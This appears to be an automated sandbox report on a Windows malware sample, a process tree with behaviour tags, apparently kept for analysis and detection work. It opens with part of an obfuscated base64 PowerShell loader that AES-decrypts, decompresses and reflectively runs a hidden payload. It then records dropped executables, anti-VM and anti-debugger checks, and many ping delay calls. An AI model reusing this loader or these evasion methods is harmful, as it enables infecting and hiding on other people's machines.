cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:3940
- C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
  C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4592

C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5236

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5448

C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6772

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{f57f25a7-42b9-4244-8ecf-41f8eda17a95}\bdd19b89-ceb6-4fe1-bf01-79db19d6e395.cmd"
1⤵
PID:7764
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7944
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8100
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9124
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9200
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4196
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5544
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1696
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1956
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9272
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9348
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9376
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:9404
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9436
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13548
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12260
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12320
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12908
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13264
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13372
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:13448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11604
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11532
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11404
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11352
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12860
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11696
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11800
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11740
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11864
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11988
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12108
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12440
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12316
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12672
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12532
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12736
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12848
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12996
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13148
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13088
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13016
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13328
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13564
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:13568
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:1684
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:4412
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13656
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13628
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13428
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13416
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:13260
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13792
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13840
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13900
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13956
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:13984
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:14004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:14032
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14060
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14092
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14116
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14136
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:14204
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14224
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14260
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:5492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14264
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14332
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7324
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2956
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:7472
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7572
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6020
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2384
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3024
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4468
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5352
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:1592
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5272
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4888
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:6204
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6216
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13812
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:460
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1180
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13888
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1012
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5248
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6748
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6804
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6960
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7060
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6996
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6892
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6940
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6772
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7128
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7192
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5192
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7228
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7296
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7452
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7080
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7724
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7944
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8040
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7108
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2116
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8100
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3576
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8200
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8272
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8300
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8324
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8352
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8376
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11304
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8400
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8588
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8468
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8560
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8532
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8476
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8640
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8668
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8696
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8712
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8752
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8776
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8828
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8860
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8896
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8932
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8956
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9028
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8972
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9116
